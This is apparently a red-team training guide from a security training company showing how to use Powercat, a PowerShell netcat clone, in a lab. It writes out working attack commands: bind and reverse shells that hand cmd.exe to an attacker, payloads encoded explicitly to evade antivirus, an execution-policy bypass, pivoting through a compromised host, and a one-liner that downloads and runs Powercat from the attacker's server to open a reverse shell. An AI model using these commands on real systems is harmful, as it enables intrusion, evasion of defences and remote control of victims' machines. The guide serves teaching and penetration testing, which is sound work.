Contents

Introduction ........................................................................................... 3
Basic Options in Powercat...................................................................... 3
Setting up Powercat ............................................................................... 3
Port Scanning ......................................................................................... 4
File Transfer ............................................................................................ 5
Bind Shell ................................................................................................ 6
Reverse Shell .......................................................................................... 7
Standalone shell ..................................................................................... 9
Encoded Shell ......................................................................................... 9
Tunnelling ............................................................................................. 10
Powercat One Liner .............................................................................. 14
Conclusion ............................................................................................ 15

Page 2 of 15
Introduction
Powercat is a simple network utility used to perform low-level network communication operations. The
tool is an implementation of the well-known Netcat in Powershell. Traditional anti-viruses are known to
allow PowerCat to execute. The installed size of the utility is 68 KB. The portability and platform
independence of the tool make it an essential arrow in every red teamer’s quiver. learn the functionality
of this tool. You can download this here.

Basic Options in Powercat

Powercat supports various options to play around with.

-l Listen for a connection

-c Connect to a listener

-p The port to connect to or listen on

-e Execute

-ep Execute PowerShell

-g Generate payload

-ge Generate Encoded payload

-d Disconnect stream

-i Input data

Setting up Powercat
A PowerShell execution policy is a safety feature in Windows that determines which scripts can or cannot
run on the system. Therefore, we need to set the PowerShell execution policy to "bypass". This would
allow all scripts to run without restriction. Thereafter, we need to download Powercat using wget.

powershell -ep bypass

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o
powercat.ps1
ls

Page 3 of 15
Now that we have downloaded the Powercat script, we can import it into the current Powershell terminal
and then use it.

Import-Module .\powercat.ps1
powercat -h

Port Scanning
Powercat is equipped with the functionality to scan for open ports. It can do this by attempting a TCP
connection to the ports defined. For example, if I have to check for a running service on ports
21,22,80,443, we can do this by:

(21,22,80,443) | % {powercat -c 192.168.1.150 -p $_ -t 1 -Verbose -d}

Note that here, we have appended port number as a list variable. The client mode (-c flag) specifies the
client to scan. As we can observe in the screenshot below that if the port was found to be open, Powercat
successfully set up a stream with the service. the disconnect option (-d) flag specifies Powercat to
disconnect the stream as soon as it gets open. Hence, this is how open ports can be discovered using
Powercat.

Page 4 of 15
File Transfer
File transfer is possible in Powercat by data input into the data stream and fetching it at the client end.
Let’s create a text file called "notes.txt" in the current folder. Here, the input flag (-i) is used to input data
into the stream. This can be used to move files, byte array objects, or strings too.
Now, we’ll first set up the listener at the client end. Let us use netcat in Linux for ease here. After setting
it up, we’ll then use Powercat to transfer this text file.

ls
powercat -c 192.168.1.3 -p 443 -i notes.txt

Whatever was in notes.txt has been transferred to our destination. As you can see, the file was
successfully created after a successful connection was terminated.

Page 5 of 15
 nc -lnvp 443 > notes.txt
ls

Bind Shell
Bind shell refers to the process where the attacker can connect to an open listener on the target machine
and interact with it. To demonstrate this, we’ll set up a listener at the target using Powercat and then
connect to it. There are two scenarios here:
Netcat to Powercat: Here, the attacker is Kali, and Windows has a listener running on it.
Attacker -> Kali
Victim -> Windows
In an ideal scenario, the attacker would deliver a code that gets executed to open a listener and then allow
the attacker to further communicate with the victim by connecting to it.

powercat -l -p 443 -e cmd

nc 192.168.1.145 443

And thus, we observe that the interactive session is now active on the attacker machine.

Page 6 of 15
Powercat to Powercat: The same could be achieved between two Powercat scripts too. On the listener,
we set up port 9000 and the attacker to connect and deliver the cmd executable.

Listener: Ignite (Windows username)

Attacker: raj (Windows username)

powercat -l -p 9000 -e cmd -v

powercat -c 192.168.1.145 -p 9000 -v

As you can see, the attacker is successfully able to connect to the listener and spawn an interactive
session. We checked the identity using whoami.

Reverse Shell
Reverse shell refers to the process in which the attacker machine has a listener running to which the
victim connects and then the attacker executes code.

1. Netcat to Powercat: Here, Kali (netcat) is the attacker machine with the listener running on port
443, and Windows running Powercat (victim) shall connect to it.

Attacker: Netcat (Kali)

Victim: Ignite (Windows username)
This is achieved by first running netcat in listener mode on the attacker machine and then running
powercat in client mode to connect.

Page 7 of 15
 nc -lvnp 443
powercat -c 192.168.1.3 -p 443 -e cmd.exe

As you can see, as soon as the victim enters the Powershell command, we get an interactive shell

Powercat to Powercat: The same can be done with two Windows devices too.
Attacker: Ignite (Windows Username)
Victim: raj (Windows Username)
Let’s set up a listener on port 9000 first and then run powercat in client mode to connect to it.

powercat -c 192.168.1.145 -p 9000 -e cmd -v

powercat -l -p 9000 -v

As you can see, an interactive shell has been spawned by connecting to this listener.

Page 8 of 15
But of course, the above Powercat command at the victim’s end is just a simulation of how gaining an
interactive shell through remote code execution in real life would work.

Standalone shell
The option is useful when a script can be executed within the system. This allows an attacker to code a
reverse shell in a ".ps1" file and wait for the script to be executed. Scenario 1: Let’s say a cron job is running
that executes a script that has to write access. One can copy-paste the following command to get a reverse
shell easily, even with no PowerShell command execution access.

powercat -c 192.168.1.3 -p 443 -e cmd.exe -g > shell.ps1

ls
.\shell.ps1

Make sure the listener is running. We are using Kali as an attacker machine using Netcat.

nc -lnvp 443

As you can see, there are multiple ways to get an interactive shell on the target machine using netcat.

Encoded Shell
To evade traditional security devices like anti-virus solutions, we can encode the shell that we used above.
Powercat has a good feature to encode commands into a Hexadecimal Array. This way, some of the basic
security features can be bypassed. This is done by:

powercat -c 192.168.1.3 -p 443 -e cmd.exe -ge > encodedshell.ps1

cat .\encodedshell.ps1

Page 9 of 15
And then the shell can be run by using the powershell -E option, which can execute an encoded string.

powershell -E <string>

The string is then encoded value from above.

We had set up a listener on our attacker machine (Kali) beforehand and were waiting for the connection.
As you can see, the shell is getting executed successfully.

nc -lvnp 443

Tunnelling
Tunnelling is the most efficient mechanism of maintaining stealth while doing red team operations or
even in real-life scenarios. Powershell and Powercat can help us with tunneling and hiding our identity
next time we conduct a red team assessment.

Page 10 of 15
Here, there are three machines. Here, the Attacker communicates with a machine with two LAN cards and
attacks a machine running on an alternate subnet (192.168.146.0/24)

Let’s assume the attacker already has access to the tunnel machine. We’ll replicate the scenario using the
Enter-PSSession command. This utility allows us to get an interactive Powershell terminal in the tunnel
with the help of credentials.

Enter-PSSession -ComputerName 192.168.1.45 -Credential raj

After we input the credentials, we can see that an interactive PowerShell session has been spawned.
We run ipconfig as a validator command. However, we made an interesting observation. This machine
had two LAN cards configured, and there was another adapter attached. It is possible that other machines
are running on this subnet.

Page 11 of 15
To work on our observation, we’d need Powercat in this system. We download it using wget.

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o
powercat.ps1
ls

But before we can run this script, we need to change the execution policy again. Also, upon a little
searching, we found that 192.168.146.129 was alive and responding. Let’s scan this system using
Powercat.

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

Import-Module .\powercat.ps1
(21, 22, 80, 443) | % { powercat -c 192.168.146.129 -p $_ -t 1 -Verbose -d}
As you can see, there were three ports open: 21,22,80

Now, if we set up a traffic relay here, our attacker system might be able to communicate and connect with
SSH on the victim machine (192.168.146.129)
We’ll use Powercat to set up a traffic relay:

powercat -l -p 9090 -r tcp:192.168.146.129:22 -v

Page 12 of 15
As you can see above, TCP traffic from port 22 on 192.168.146.129 is now being relayed by
192.168.146.128 (tunnel) on port 9090. Thus, from an external system, we use PuTTY to connect to the
tunnel machine’s 9090 port, which will connect us to the victim machine.

And just like that, we now have completed our tunnel and accessed our victim machine.

Page 13 of 15
We can use Powercat to setup a relay on port 80 too through which we’ll be able to access the website
running on victim.

powercat -l -p 9090 -r tcp:192.168.146.129:80 -v

As evident, the victim is now accessible through this tunnel.

Powercat One Liner

Powercat’s reverse shell exists as a one-liner command too. Assuming that we have code execution on
the victim, we can use Powercat’s one-liner to get a reverse shell back on the listener running on the
attacker’s machine. For this process, we need to download Powercat in a separate folder and run a web
server.

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
python -m SimpleHTTPServer 80

Page 14 of 15
Now, we’ll set up a listener on port 4444 in the attacker (kali) machine immediately. Meanwhile, we have
code execution on the target and thus, we’ll use the following Powershell/Powercat one-liner:

powershell -c "IEX(New-Object
System.Net.WebClient).DownloadString('http://192.168.1.3/powercat.ps1');powercat -c
192.168.1.3 -p 4444 -e cmd"

Soon as we hit enter, we’ll receive a reverse shell on the listener running in Kali.

nc -lvp 4444

Conclusion
As a result, we've demonstrated the various Powercat features. The tool is being readily used in red team
assessments and is becoming part of major cyber security certification courses. I hope the article helps
aspirants/students, or analysts understand the tool in a simple and effective way.

Page 15 of 15
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in